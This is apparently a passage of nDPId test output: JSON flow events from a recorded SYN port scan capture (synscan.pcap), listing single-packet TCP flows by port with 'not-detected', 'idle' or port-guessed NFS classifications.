+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","ndpi": 